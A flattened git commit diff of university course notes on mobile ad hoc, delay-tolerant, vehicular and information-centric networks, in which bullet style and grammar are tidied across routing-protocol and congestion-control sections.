This commit is contained in:
John Gatward committed 2026-10-04 15:24:17 +01:00
1 parent d0f27f276b
commit d6f54d4ec2
103 files changed
+2801 -2917

No files matched your search

+36 -38
View File
@@ -2,78 +2,76 @@
##### Part 1 ##### Part 1
* Mobile Ad Hoc Networks (MANETs) - Mobile Ad Hoc Networks (MANETs)
* Delay/Disconnection Tolerant Networks (DTNs) - Delay/Disconnection Tolerant Networks (DTNs)
* Vehicular Ad Hoc Networks (VANETs) - Vehicular Ad Hoc Networks (VANETs)
##### Part 2 ##### Part 2
* Network experimentation, criteria and evaluations. This part is to help with coursework - Network experimentation, criteria and evaluations. This part is to help with coursework
##### Part 3 ##### Part 3
* Peer to Peer (P2P) - Peer-to-Peer (P2P)
* Content Centric Networks (CCNs) - Content Centric Networks (CCNs)
* Information Centric Networks (ICNs) - Information Centric Networks (ICNs)
##### Part 4 ##### Part 4
* Software Defined Networks (SDNs) and Applications - Software Defined Networks (SDNs) and Applications
# Mobile Social Networks # Mobile Social Networks
They have two parts: physical part and a social part They have two parts: a physical part and a social part.
Social structures are vital for these networks - think covid tracking networks Social structures are vital for these networks - think COVID tracking networks.
![p2p](img/a.png) ![p2p](img/a.png)
Clouds have multiple layers Clouds have multiple layers
* Network interfaces - Network interfaces
* Request & accept sensor data - Request & accept sensor data
* resource management - Resource management
* communicate with other clouds - Communicate with other clouds
* Processing layer - Processing layer
* Store raw data - Store raw data
* filter noise - Filter noise
* Analysing layer - Analysing layer
* produce trend chart - Produce trend charts
* learn & predict user behaviour - Learn and predict user behaviour
* Services - Services
* Interactive dashboard - Interactive dashboard
* notification service - Notification service
* sharing access - Sharing access
## Vehicle Ad Hoc Networks ## Vehicle Ad Hoc Networks
Have social characteristics as they are driven by humans Have social characteristics as they are driven by humans.
VANETs may refer to robots or drones. VANETs may refer to robots or drones.
This can be used to exchange warning and beacon messages via V2V (vehicle to vehicle) as well as V2I (vehicle to infrastructure) channels. This can be used to exchange warning and beacon messages via V2V (vehicle to vehicle) as well as V2I (vehicle to infrastructure) channels.
### Fully autonomous Vehicles ### Fully Autonomous Vehicles
![img](img/b.png) ![img](img/b.png)
Vehicles can connect to the cloud and share & request information to help other vehicles. Vehicles can connect to the cloud and share and request information to help other vehicles.
![img](img/c.png) ![img](img/c.png)
An example of transient clouds - in this case vehicular clouds. An example of transient clouds - in this case vehicular clouds.
This can be useful for informing cars behind about congestion. This is real time communication (order of ms which is needed for when cars are moving at 70 mph), cloud communication is not fast enough, due to the data needing to be processed before shared. This can be useful for informing cars behind about congestion. This is real-time communication (on the order of milliseconds, which is needed when cars are moving at 70 mph). Cloud communication is not fast enough, due to the data needing to be processed before it is shared.
## Challenges ## Challenges
* Optimal forwarding/routing - Optimal forwarding/routing
* Congestion avoidance and control - Congestion avoidance and control
* Security and privacy aware communications - Security and privacy aware communications
* black & grey hole attacks - black & grey hole attacks
* Energy efficient communications - Energy efficient communications
* Important for mobile devices & electric cars - Important for mobile devices & electric cars
* Service provision - Service provision
* Location based services - Location based services
+32 -33
View File
@@ -1,47 +1,46 @@
# Mobile Ad Hoc Networks (MANETs) # Mobile Ad Hoc Networks (MANETs)
* An infrastructure-less network formed by mobile wireless nodes - An infrastructure-less network formed by mobile wireless nodes
* Nodes in MANET can communicate via single or multi-hop approach (due to absence of centralised network infrastructure) - Nodes in a MANET can communicate via a single- or multi-hop approach (due to the absence of centralised network infrastructure)
* Nodes operate as clients, routers and servers at the same time to forward packets - Nodes operate as clients, routers and servers at the same time to forward packets
* The mobility of nodes results in frequent and unpredictable changes in network topology - The mobility of nodes results in frequent and unpredictable changes in network topology
One of the core features of a MANET node is the ability to autonomously connect to other nodes and configure itself for data transmission over the network. One of the core features of a MANET node is the ability to autonomously connect to other nodes and configure itself for data transmission over the network.
#### MANET Routing #### MANET Routing
* Mobile wireless nodes create a temporary connection between them to forward data - Mobile wireless nodes create a temporary connection between them to forward data
* Because some nodes may not be cooperative or faulty, they may drop/compromise packets - Because some nodes may be uncooperative or faulty, they may drop or compromise packets
* Typically routing is split into **route discovery** and **actual data transmission**. - Typically routing is split into **route discovery** and **actual data transmission**.
* Nodes have to self organise in order to route. - Nodes have to self-organise in order to route.
![img](img/d.png) ![img](img/d.png)
(green boxes is route chosen) (The green boxes show the chosen route.)
The source has a limited range of nodes it can detect, it cannot send it direct to the destination as it doesn't know where the destination is. Hops are decided by communication protocols. The source has a limited range of nodes it can detect. It cannot send data directly to the destination as it doesn't know where the destination is. Hops are decided by communication protocols.
#### Proactive MANETs #### Proactive MANETs
* Also known as table driven routing protocol - Also known as table-driven routing protocols
* Nodes in the network maintain a comprehensive routing information of the network - Nodes in the network maintain comprehensive routing information about the network
* This is done by spreading network status information to nodes and tracking changes in network topology - think the network is constantly pinged - This is done by spreading network status information to nodes and tracking changes in network topology - think the network is constantly pinged
* These status updates can slow the network with the traffic - These status updates can slow the network with the traffic
* Useful if the network is not that large - Useful if the network is not that large
#### Reactive MANETs #### Reactive MANETs
* Also known as on-demand routing - Also known as on-demand routing
* Network nodes only store information of paths to destination nodes - Network nodes only store information about paths to destination nodes
* Nodes delay the search for routes to new destinations in order to reduce communication overheads - Nodes delay the search for routes to new destinations in order to reduce communication overheads
* i.e. if a route is found between A and B, this route will be stored and not recalculated - i.e. if a route is found between A and B, this route will be stored and not recalculated
* May be slower, as a shorter path may not be used - May be slower, as a shorter path may not be used
#### Hybrid MANETs #### Hybrid MANETs
* Hybrid protocols combine the advantages of proactive and reactive protocols to reduce traffic overheads and route discovery delays - Hybrid protocols combine the advantages of proactive and reactive protocols to reduce traffic overheads and route discovery delays
Table showing all different protocols of MANETs Table showing the different MANET protocols:
![img](img/e.png) ![img](img/e.png)
@@ -49,22 +48,22 @@ Table showing all different protocols of MANETs
Traditional MANET routing protocols like DSR and AODV (both reactive) cannot work in intermittent infrastructure-less environments because they require a complete path from source to destination for communication. Traditional MANET routing protocols like DSR and AODV (both reactive) cannot work in intermittent infrastructure-less environments because they require a complete path from source to destination for communication.
* Messages get dropped at intermediate nodes when the link to the next hop is none existent in MANETs - Messages get dropped at intermediate nodes when the link to the next hop is non-existent in MANETs
* DTNs expand MANETs to allow more intermittent and sparse connections of nodes caused by node mobility or low transmission range. - DTNs expand MANETs to allow more intermittent and sparse connections between nodes caused by node mobility or low transmission range.
#### Store-carry-forward Paradigm #### Store-carry-forward Paradigm
* DTN routing protocols allow forwarding of messages by using a 'store-carry-forward' approach. - DTN routing protocols allow forwarding of messages by using a 'store-carry-forward' approach.
* messages are stored by nodes and moved in hops throughout the network until messages reach their destination - Messages are stored by nodes and moved in hops throughout the network until they reach their destination
* This approach is used by DTN routing protocols to increase the probability of message delivery. - This approach is used by DTN routing protocols to increase the probability of message delivery.
#### DTN Protocol Classifications #### DTN Protocol Classifications
##### Flooding based ##### Flooding-Based
* Flooding based routing protocols spread a message and have multiple copies of the message in the network. - Flooding-based routing protocols spread a message and have multiple copies of the message in the network.
* This is done to increase the probability of messages reaching their destination and also decrease the time of delivery - This is done to increase the probability of messages reaching their destination and also decrease the time of delivery
##### Forwarding based ##### Forwarding-Based
* Forwarding based routing protocols gather information about the nodes in a network to select the best path to forward messages with the aim of enhancing message delivery networks with limited resources. - Forwarding-based routing protocols gather information about the nodes in a network to select the best path to forward messages, with the aim of enhancing message delivery in networks with limited resources.
+34 -34
View File
@@ -1,23 +1,23 @@
# Vehicular Ad Hoc Networks # Vehicular Ad Hoc Networks
* VANETs are a special type of Mobile Ad Hoc network which is used to - VANETs are a special type of mobile ad hoc network used to provide communication:
* provide communication between vehicles that are nearby (V2V) - Between nearby vehicles (V2V)
* between vehicles on the road and fixed infrastructures on the roadside (V2I) - Between vehicles on the road and fixed infrastructure on the roadside (V2I)
* VANETs provide complementary approach for intelligent transport system (ITS) and are characterised by **high node mobility** and the limited degree of freedom in the mobility patterns. - VANETs provide a complementary approach for intelligent transport systems (ITS) and are characterised by **high node mobility** and a limited degree of freedom in their mobility patterns.
##### Categories of information ##### Categories of information
1. Safety application information 1. Safety application information
* e.g. information regarding an accident that has just occurred - e.g. information regarding an accident that has just occurred
* the current conditions of the road - the current conditions of the road
2. Convenience application 2. Convenience application
* traffic information - traffic information
* parking availability - parking availability
3. Commercial application for pleasure 3. Commercial application for pleasure
* games - games
* real-time video relay - real-time video relay
### Why do VANETs need different protocols to MANETs ### Why Do VANETs Need Different Protocols from MANETs?
###### Large scale ###### Large scale
@@ -25,7 +25,7 @@
###### Predictive Mobility ###### Predictive Mobility
> The nodes in a VANET cannot follow arbitrary direction, they have to stay on the road and cannot suddenly change their direction. > The nodes in a VANET cannot follow arbitrary directions. They have to stay on the road and cannot suddenly change direction.
###### High Mobility ###### High Mobility
@@ -33,49 +33,49 @@
###### Partitioned Network ###### Partitioned Network
> The ranges of wireless communication used in V2V networks is near 1 km but vehicles can get disconnected. Can be thought of many disconnected networks. > The range of wireless communication used in V2V networks is around 1 km, but vehicles can become disconnected. This can be thought of as many disconnected networks.
The nodes in the VANET can move at **high speeds** which **reduces transmission capacity**, this causes the following issues: The nodes in the VANET can move at **high speeds**, which **reduces transmission capacity**. This causes the following issues:
* **Rapid changes in the network topology** because the state of connectivity between nodes is dynamically changing. - **Rapid changes in the network topology** because the state of connectivity between nodes is dynamically changing.
* **Occasional disconnections due to low traffic density**. This keeps the nodes distant from each other and results to **link failure** that could last for awhile. - **Occasional disconnections due to low traffic density**. This keeps the nodes distant from each other and results in **link failure** that could last for a while.
* **Node congestion**, a high traffic situation which affects protocol performance. - **Node congestion**, a high traffic situation which affects protocol performance.
### WAVE IEEE 802.11p ### WAVE IEEE 802.11p
WAVE - Wireless Access for Vehicular Environment WAVE - Wireless Access for Vehicular Environment
* In WAVE vehicles communicate in a **hop by hop** manner with each other - In WAVE, vehicles communicate with each other in a **hop-by-hop** manner
* The area of coverage for the WAVE node is limited to 300m-800m - The area of coverage for the WAVE node is limited to 300 m-800 m
* Beyond this range cars cannot communicate - Beyond this range cars cannot communicate
If there is dense traffic in the coverage region, **nodes become easily congested** because all nodes will be transmitting the same message to every other node. If there is dense traffic in the coverage region, **nodes become easily congested** because all nodes will be transmitting the same message to every other node.
> To overcome the limitation of restricted coverage region, the use of DTNs was implemented which uses a **store-carry-forward paradigm**. > To overcome the limitation of a restricted coverage region, DTNs were implemented using a **store-carry-forward paradigm**.
> >
> With the store-carry-forward approach, a vehicle stores a message in a buffer and carries the message with it. When it comes into contact with another node, it forwards the message. > With the store-carry-forward approach, a vehicle stores a message in a buffer and carries the message with it. When it comes into contact with another node, it forwards the message.
> >
> * This introduced the idea of the **Vehicular Delay Tolerant Network (VDTN)** concept > - This introduced the idea of the **Vehicular Delay Tolerant Network (VDTN)** concept
#### Vehicular Delay Tolerant Network (VDTN) #### Vehicular Delay Tolerant Network (VDTN)
VDTNs enable communication in the face of connectivity issues such as VDTNs enable communication in the face of connectivity issues such as
* long and variable delay - long and variable delay
* sparse and intermittent connectivity - sparse and intermittent connectivity
* high error rates - high error rates
* high latency - high latency
* high asymmetric data rate - high asymmetric data rate
Communication is made possible in the network when intermediate nodes become **custodians** of the message being transmitted and then forward the message only when a opportunity arises. Communication is made possible in the network when intermediate nodes become **custodians** of the message being transmitted and then forward the message only when an opportunity arises.
###### Fixed DTN nodes ###### Fixed DTN nodes
* The stationary or relay nodes have store and forward capabilities and are located at **road-side intersections** (road side units) - The stationary or relay nodes have store-and-forward capabilities and are located at **roadside intersections** (roadside units)
* They allow mobile nodes that pass by to collect and leave data on them. - They allow mobile nodes that pass by to collect and leave data on them.
* They contribute to increasing the frequency of node contacts and improve **delivery ratio** and **delivery delay**. - They contribute to increasing the frequency of node contacts and improve **delivery ratio** and **delivery delay**.
![img](img/f.png) ![img](img/f.png)
@@ -85,7 +85,7 @@ Communication is made possible in the network when intermediate nodes become **c
> Pure cellular VANETs may use **fixed cellular gateways and WiMAX access points at road** intersections to gather information > Pure cellular VANETs may use **fixed cellular gateways and WiMAX access points at road** intersections to gather information
> >
> * note these road side gateways may not be feasible due to cost of infrastructure > - Note that these roadside gateways may not be feasible due to the cost of infrastructure
> >
> The information collected from sensors of a vehicle in the VANET can become valuable in notifying other nodes about the situation of the traffic in the network. > The information collected from sensors of a vehicle in the VANET can become valuable in notifying other nodes about the situation of the traffic in the network.
@@ -97,6 +97,6 @@ Communication is made possible in the network when intermediate nodes become **c
##### Hybrid ##### Hybrid
> The hybrid category is a combination of the first two. It provides a richer content and offers great **flexibility in the sharing of data** > The hybrid category is a combination of the first two. It provides richer content and offers great **flexibility in the sharing of data**
> >
> * Some vehicles with WLAN and cellular capabilities may be used as **gateways** and **mobile routers** so that vehicles with only WLAN capabilities can interact and communicate effectively with them via multi-hop links. > - Some vehicles with WLAN and cellular capabilities may be used as **gateways** and **mobile routers** so that vehicles with only WLAN capabilities can interact and communicate effectively with them via multi-hop links.
+36 -37
View File
@@ -4,62 +4,61 @@
Where each message may only be under the custody of a single node. Where each message may only be under the custody of a single node.
* Upon forwarding the message, the receiving node also takes on the responsibility of custody. - Upon forwarding the message, the receiving node also takes on the responsibility of custody.
* This means there will exist only one copy of the message within the network at any period of time. - This means there will exist only one copy of the message within the network at any period of time.
#### Direct Transmission #### Direct Transmission
* Direct transmission is the simplest single-copy forwarding protocol possible. - Direct transmission is the simplest single-copy forwarding protocol possible.
* Once the source has generated a message, it will retain custody and carry it until it encounters the destination. - Once the source has generated a message, it will retain custody and carry it until it encounters the destination.
* Once a connection with the destination is established, the message is forwarded directly - Once a connection with the destination is established, the message is forwarded directly
* This uses minimal resources - This uses minimal resources
* Has unbounded amounts of latency - Has unbounded amounts of latency
* Probability of a message being delivered is only as likely as the probability of the node encountering the destination node - Probability of a message being delivered is only as likely as the probability of the node encountering the destination node
#### First Contact #### First Contact
* First contact is a single-copy based forwarding protocol - it randomly chooses a node out of all possible nodes and forwards as many messages as possible to that node. - First contact is a single-copy based forwarding protocol - it randomly chooses a node out of all possible nodes and forwards as many messages as possible to that node.
* If no connections are available, the first encountered node will be used. - If no connections are available, the first encountered node will be used.
* Once the message(s) are sent, the messages on the original node are deleted, relinquishing custody to the new node. - Once the message(s) are sent, the messages on the original node are deleted, relinquishing custody to the new node.
* This protocol routes messages throughout the network via a random walk pattern. - This protocol routes messages throughout the network via a random walk pattern.
* This can lead to packets being routed to dead ends. - This can lead to packets being routed to dead ends.
* Packets can make negative progress or getting stuck in a loop. - Packets can make negative progress or get stuck in a loop.
### Replication Based ### Replication Based
Replication-based protocols disseminate messages throughout the network via replication of the messages. Replication-based protocols disseminate messages throughout the network via replication of the messages.
* When one node encounters another, it will forward the message while retaining the local copy it has. - When one node encounters another, it will forward the message while retaining the local copy it has.
* The existence of multiple copies increases the probability of message delivery and reduces latency. - The existence of multiple copies increases the probability of message delivery and reduces latency.
* The more nodes carrying the message, the more chance one node encounters the destination. - The more nodes carrying the message, the more chance one node encounters the destination.
* However this also means there are many redundant messages on the network - therefore more resources are needed. - However, this also means there are many redundant messages on the network - therefore more resources are needed.
#### Epidemic #### Epidemic
* Utilising the flooding concept, Epidemic aims to achieve message delivery by flooding the network with message copies. - Utilising the flooding concept, Epidemic aims to achieve message delivery by flooding the network with message copies.
* When any two nodes meet, they compare messages. - When any two nodes meet, they compare messages.
* They then exchange messages they do not have in common - They then exchange messages they do not have in common
* This is repeated allowing the messages to spread similar to an epidemic. - This is repeated, allowing the messages to spread similarly to an epidemic.
* This method achieves minimal latency & high delivery probabilities however suffers from limited resources. - This method achieves minimal latency and high delivery probabilities, but suffers from limited resources.
#### MaxProp #### MaxProp
* Like epidemic, maxprop floods the network, however each message has a priority. - Like Epidemic, MaxProp floods the network, but each message has a priority.
* Messages stored in a **ordered-queue** in the **message buffer**. - Messages are stored in an **ordered queue** in the **message buffer**.
* Messages with a higher probability of being delivered have a higher priory of being forwarded first. - Messages with a higher probability of being delivered have a higher priority of being forwarded first.
* To determine the probability, it looks at **history of encounters**, maintaining a vector with **tracks the likelihood of the node encountering any other node in the network**. - To determine the probability, it looks at the **history of encounters**, maintaining a vector that **tracks the likelihood of the node encountering any other node in the network**.
* When two nodes meet, they exchange messages and vectors, updating their own local copy. - When two nodes meet, they exchange messages and vectors, updating their own local copy.
* These vectors are then used to compute the shortest path for each message, messages are then ordered within the buffer by destination cost. - These vectors are then used to compute the shortest path for each message. Messages are then ordered within the buffer by destination cost.
* MaxProp uses overhead messages to acknowledge when a message has reached it destination - MaxProp uses overhead messages to acknowledge when a message has reached its destination
* Once this ACK signal is received, all local copies of redundant messages are dropped. - Once this ACK signal is received, all local copies of redundant messages are dropped.
#### PROPHET #### PROPHET
Probabilistic Routing Protocol using History of Encounters and Transitivity (PRoPHET) Probabilistic Routing Protocol using History of Encounters and Transitivity (PRoPHET)
* PROPHET maintains a vector that keeps track of a history of the encountered nodes. - PROPHET maintains a vector that keeps track of a history of the encountered nodes.
* It uses this vector to calculate the probability of a message copy reaching its destination by being forwarded to a particular node. - It uses this vector to calculate the probability of a message copy reaching its destination by being forwarded to a particular node.
* When a source node forwards a message copy, it selects a subset of nodes that it can possibly send to. - When a source node forwards a message copy, it selects a subset of nodes that it can possibly send to.
* The algorithm then **ranks these nodes** based on the calculated probabilities, with the copy being forwarded to the highest ranked nodes first. - The algorithm then **ranks these nodes** based on the calculated probabilities, with the copy being forwarded to the highest ranked nodes first.
* This is effective however the routing tables **rapidly grow** as a result of the amount of information on the nodes required to calculate the probability predictions. - This is effective, but the routing tables **rapidly grow** as a result of the amount of information about the nodes required to calculate the probability predictions.
+20 -20
View File
@@ -6,39 +6,39 @@
#### Spray and Focus #### Spray and Focus
* Spray and focus replicates an allowable number of messages from source in the spray phase. - Spray and Focus replicates an allowable number of messages from the source in the spray phase.
* **The focus phase allows** each node to forward a copy of its messages to other potential nodes until the messages gets to its destination. - **The focus phase allows** each node to forward a copy of its messages to other potential nodes until the messages reach their destinations.
* The protocol uses a single-copy utility based routing scheme to forward a copy of the message further. - The protocol uses a single-copy, utility-based routing scheme to forward a copy of the message further.
* Forwarding decisions are made based on **timers** which record the times nodes come in communication range of each other. - Forwarding decisions are made based on **timers** which record the times when nodes come within communication range of each other.
* Node $A$ forwards message with destination $D$ to node $B$ , **if and only if** $B$ has a higher potential of delivering the message to $D$. - Node $A$ forwards a message with destination $D$ to node $B$, **if and only if** $B$ has a higher potential of delivering the message to $D$.
#### SimBet #### SimBet
* A source node with no prior knowledge of the destination node will forward a message to a more central node that has the potential of finding a suitable relay node. - A source node with no prior knowledge of the destination node will forward a message to a more central node that has the potential of finding a suitable relay node.
* A central node has the ease of connecting other nodes in a network. - A central node has the ease of connecting other nodes in a network.
* This is known as **centrality** a measure of the **structural importance** of a node in a network. - This is known as **centrality**, a measure of the **structural importance** of a node in a network.
* A central node uses **similarity and betweenness centrality** to avoid unnecessary information exchange in the entire network. - A central node uses **similarity and betweenness centrality** to avoid unnecessary information exchange in the entire network.
* SimBet maintains a single copy of each message in the network to reduce resource overheads. - SimBet maintains a single copy of each message in the network to reduce resource overheads.
### Replication Management ### Replication Management
Replication Management refers to easing network congestion by managing the amount and frequency that messages are replicated. Replication management refers to easing network congestion by managing the number of message copies and the frequency with which messages are replicated.
* This is particularly notable concern as it is often the replication of messages that leads to congestion in DTNs, with surplus and redundant messages causing wastage within node message buffers. - This is a particularly notable concern as it is often the replication of messages that leads to congestion in DTNs, with surplus and redundant messages causing wastage within node message buffers.
#### Café #### Café
* Congestion Aware Forwarding Algorithm (Café) - Congestion Aware Forwarding Algorithm (Café)
* Single-copy - Single-copy
* Adaptive forwarding techniques - to reduce network congestion by directing traffic away from nodes experiencing congestion to less congested areas of the network. - Adaptive forwarding techniques - to reduce network congestion by directing traffic away from nodes experiencing congestion to less congested areas of the network.
* Uses **Contact Manager** and **Congestion Manager** - Uses **Contact Manager** and **Congestion Manager**
**Contact Manager** - deals with nodes forwarding heuristics, updating statistics for each contact such as frequency and duration's. **Contact Manager** - deals with nodes' forwarding heuristics, updating statistics for each contact such as frequency and duration.
**Congestion Manager** - focuses on calculating the availability of nodes, keeping and updating a record of information such as the amount of available buffer and delays expected from each contacted node. **Congestion Manager** - focuses on calculating the availability of nodes, keeping and updating a record of information such as the amount of available buffer and delays expected from each contacted node.
#### CafREP #### CafREP
* Congestion Aware Forwarding and Replication (CafREP) - Congestion Aware Forwarding and Replication (CafREP)
* replication-based - replication-based
* builds on Cafe protocol by coalescing the proposed **adaptive forwarding algorithm with an adaptive replication management technique** - Builds on the Café protocol by coalescing the proposed **adaptive forwarding algorithm with an adaptive replication management technique**
+18 -18
View File
@@ -1,18 +1,18 @@
# Framework for Congestion Control in Delay Tolerant Opportunistic Networks # Framework for Congestion Control in Delay Tolerant Opportunistic Networks
DTNs mainly focus on increasing the probability to deliver to the destination and on minimising delays DTNs mainly focus on increasing the probability of delivery to the destination and on minimising delays.
* Using complex graph theory techniques - Using complex graph theory techniques
* Where load is unfairly distributed towards the better connected nodes - Where load is unfairly distributed towards the better connected nodes
* May lead to network congestion - May lead to network congestion
## CAFREP ## CAFREP
CAFREP or Congestion Aware Forwarding and Replication CAFREP or Congestion Aware Forwarding and Replication
* Detects the congested nodes and parts of the network - Detects the congested nodes and parts of the network
* Moves the traffic away from hot-spots and spreads it around while preserving the directionality of the traffic and not overwhelming non-interested nodes with unwanted content - Moves the traffic away from hot-spots and spreads it around while preserving the directionality of the traffic and not overwhelming non-interested nodes with unwanted content
* Adaptively change message replication rates - Adaptively changes message replication rates
When deciding on the best carrier and the optimal number of messages, CAFREP dynamically combines three heuristics When deciding on the best carrier and the optimal number of messages, CAFREP dynamically combines three heuristics
@@ -22,7 +22,7 @@ When deciding on the best carrier and the optimal number of messages, CAFREP dyn
![img](img/g.png) ![img](img/g.png)
Each layer you go up, the more information is exchanged between the nodes. As you move up each layer, more information is exchanged between the nodes.
### Metrics ### Metrics
@@ -34,43 +34,43 @@ $$
Ret(X) = B_c(X) - \sum^N_{i=1} \space M^i_{size}(X) Ret(X) = B_c(X) - \sum^N_{i=1} \space M^i_{size}(X)
$$ $$
For a node $X$, it has buffer of size $B_c(X)$. When a message of size $M^i_{size}$ is sent to node $X$, it's buffer size is the total buffer minus the memory taken by the sum of all messages in the buffer. Node $X$ has a buffer of size $B_c(X)$. When a message of size $M^i_{size}$ is sent to node $X$, its available buffer size is the total buffer minus the memory taken by the sum of all messages in the buffer.
###### Node Receptiveness ###### Node Receptiveness
- Aims to avoid or decrease sending rates to the **nodes** that have higher in network delays - Aims to avoid or decrease sending rates to the **nodes** that have higher in-network delays
$$ $$
Rec(X) = \sum^N_{i=1}(T_{now} - M^i_{received}(X)) Rec(X) = \sum^N_{i=1}(T_{now} - M^i_{received}(X))
$$ $$
How long a node keeps a message before forwarding it on. If a high level of receptiveness is found on a node, it means the node isn't useful as messages aren't forwarded. Could mean the node has limited connections. How long a node keeps a message before forwarding it on. If a high level of receptiveness is found on a node, it means the node isn't useful as messages aren't forwarded. This could mean the node has limited connections.
###### Node Congestion Rate ###### Node Congestion Rate
- Aims to avoid or decrease sending rates to **nodes** that congest at the higher rate - Aims to avoid or decrease sending rates to **nodes** that become congested at a higher rate
$$ $$
CR(X) = \frac{100\cdot T_{FullBuffer}(X)/T_{TotalTime}(X)}{\frac{1}{N}\cdot \sum^N_{i=1}(T_iend(X) - T_istart(X))} CR(X) = \frac{100\cdot T_{FullBuffer}(X)/T_{TotalTime}(X)}{\frac{1}{N}\cdot \sum^N_{i=1}(T_iend(X) - T_istart(X))}
$$ $$
Estimates the time between a node being full and full again. Measures the time the node is unusable. Estimates the time between a node being full and becoming full again. Measures the time the node is unusable.
#### Ego Network Congestion Metrics #### Ego Network Congestion Metrics
###### Ego Network Retentiveness ###### Ego Network Retentiveness
* Aims to replicate less at the **parts of the network** with lower buffer availability. - Aims to replicate less at the **parts of the network** with lower buffer availability.
$$ $$
EN_{Ret}(X) = \frac{1}{N}\sum^N_{i=1}Ret(C_i(X)) EN_{Ret}(X) = \frac{1}{N}\sum^N_{i=1}Ret(C_i(X))
$$ $$
Gets the average of the retentiveness of node $X$ and it's neighbours $c_i(X)$ Gets the average retentiveness of node $X$ and its neighbours $c_i(X)$.
###### Ego Network Receptiveness ###### Ego Network Receptiveness
* Aims to replicate less at **parts of the network** with higher delays. - Aims to replicate less at **parts of the network** with higher delays.
$$ $$
EN_{Rec}(X) = \frac{1}{N}\sum^N_{i=1}Rec(c_i(X)) EN_{Rec}(X) = \frac{1}{N}\sum^N_{i=1}Rec(c_i(X))
@@ -79,7 +79,7 @@ $$
###### Ego Network Congestion Rate ###### Ego Network Congestion Rate
- Aims to send less to the **parts of the network** that have higher congestion rates. - Aims to send less to the **parts of the network** that have higher congestion rates.
- This is useful as if a node isn't congested, but all connected nodes are. It stops it from being used. - This is useful if a node isn't congested but all connected nodes are. It stops the node from being used.
$$ $$
EN_{CR}(X) = \frac{1}{N}\sum^N_{i=1}CR_i(X) EN_{CR}(X) = \frac{1}{N}\sum^N_{i=1}CR_i(X)
@@ -93,6 +93,6 @@ $$
Replication\space rate = M \times \frac{TotalUtil(Y)}{TotalUtil(X) + TotalUtil(Y)} Replication\space rate = M \times \frac{TotalUtil(Y)}{TotalUtil(X) + TotalUtil(Y)}
$$ $$
Total utility, changes constantly. The replication limit grows to take advantage of all available resources, and backs off when congestion increases. Total utility changes constantly. The replication limit grows to take advantage of all available resources and backs off when congestion increases.
Social utility prevents replication at a high rate on free nodes that are not on the path to the destination. Social utility prevents replication at a high rate on free nodes that are not on the path to the destination.
@@ -1,17 +1,17 @@
# Information Centric Networks # Information-Centric Networks
#### Problems with today's Networks #### Problems with today's Networks
* URLs and IP addresses are overloaded with locator and identifier functionality. - URLs and IP addresses are overloaded with locator and identifier functionality.
* No consistent way to keep track of *identical copies*. - No consistent way to keep track of *identical copies*.
* Information dissemination is inefficient. - Information dissemination is inefficient.
* Cannot benefit from existing copies - Cannot benefit from existing copies
* Can lead to problems like Flash-Crowd effect and Denial of service - Can lead to problems like Flash-Crowd effect and Denial of service
* Can't trust a copy received from an un-trusted node - Can't trust a copy received from an untrusted node
* Security is host-Centric - Security is host-centric
* Based on *securing channels* (encryption) and trusting servers (authentication) - Based on *securing channels* (encryption) and trusting servers (authentication)
* Application and content providers are independent of each other - Application and content providers are independent of each other
* CDNs focus on web content distributions for major players - CDNs focus on web content distributions for major players
![img](img/i.png) ![img](img/i.png)
@@ -25,78 +25,78 @@
Apart from routing protocols that use direct identifiers of nodes, networking can take place based directly on content. Apart from routing protocols that use direct identifiers of nodes, networking can take place based directly on content.
* Content can be **collected** from the network, **processed** in the network and **stored** in the network. - Content can be **collected** from the network, **processed** in the network and **stored** in the network.
* The goal is to provide a network infrastructure capable of providing services better suited to today's application requirements - The goal is to provide a network infrastructure capable of providing services better suited to today's application requirements
* Content distribution and mobility - Content distribution and mobility
* More resilience to disruption and failures - More resilience to disruption and failures
#### Network Evolution #### Network Evolution
**Traditional networking** **Traditional networking**
- Host-Centric communications, addressing and end-points - Host-centric communications, addressing and endpoints
**ICNs** **ICNs**
- Data-Centric communications addressing information - Data-centric communications addressing information
- Decoupling in space - neither sender nor receiver need to know their partner. - Decoupling in space - neither sender nor receiver needs to know their partner.
- Decoupling in time - *answer* not necessarily directly triggered by a *question*. **asynchronous communication**. - Decoupling in time - *answer* not necessarily directly triggered by a *question*. **asynchronous communication**.
#### Approach #### Approach
* Named Data Objects (NDOs) - Named Data Objects (NDOs)
* In-network caching/storage - In-network caching/storage
* Multi-party communication through replication - Multi-party communication through replication
* Senders decoupled from receivers - Senders decoupled from receivers
### Dissemination Networking ### Dissemination Networking
* Data is requested by name, using any and all means available (IP, VPN tunnels, multi-cast, proxies etc) - Data is requested by name, using any and all means available (IP, VPN tunnels, multicast, proxies etc.)
* Anything that hears the request and has a valid copy of the data can respond. - Anything that hears the request and has a valid copy of the data can respond.
* The returned data is signed, and optionally secured, so its integrity & association with name can be validated (data-Centric security) - The returned data is signed, and optionally secured, so its integrity and association with its name can be validated (data-centric security)
![ICN Stack](img/j.png) ![ICN Stack](img/j.png)
* Change of network abstraction from **named host** to **named content** (content chunks). - Change of network abstraction from **named host** to **named content** (content chunks).
* Security is built in - **secures content** and **not the hosts**. - Security is built in - **secures content** and **not the hosts**.
* **Mobility** is present by design. - **Mobility** is present by design.
* Can handle **static** and **dynamic** content. - Can handle **static** and **dynamic** content.
#### Naming Data #### Naming Data
###### Solution 1 - Name the data ###### Solution 1 - Name the data
- **Flat** - non human readable identifiers - **Flat** - non-human-readable identifiers
- `1HJKRH535KJH252JLH3424JLBNL` - `1HJKRH535KJH252JLH3424JLBNL`
- **Hierarchical** - meaningful structured names - **Hierarchical** - meaningful structured names
- `/nytimes/sport/baseball/mets/game0224143` - `/nytimes/sport/baseball/mets/game0224143`
###### Solution 2 - Describe the data ###### Solution 2 - Describe the data
- With a set of tags - With a set of tags
- `baseball, new york, mets` - `baseball, new york, mets`
- With schema that defines attributes, values and relations among attributes - With a schema that defines attributes, values and relations among attributes
##### Using Names in CCNs (Content Centric Networks) ##### Using Names in CCNs (Content Centric Networks)
- The hierarchical structure is used to do *longest match look-ups* which guarantees $log(n)$ state scaling for globally accessible data. - The hierarchical structure is used to do *longest-match look-ups*, which guarantees $log(n)$ state scaling for globally accessible data.
- Although CCN names are longer than IP identifiers, their **explicit structure** allows look-ups as efficient as IP's. - Although CCN names are longer than IP identifiers, their **explicit structure** allows look-ups as efficient as IP's.
### ICN Forwarding ### ICN Forwarding
* Consumer *broadcasts* and *interest* over all available communication media - The consumer *broadcasts* an *interest* over all available communication media
* Interest identifies a *collection of data* whose name has the interest as a prefex. - The interest identifies a *collection of data* whose name has the interest as a prefix.
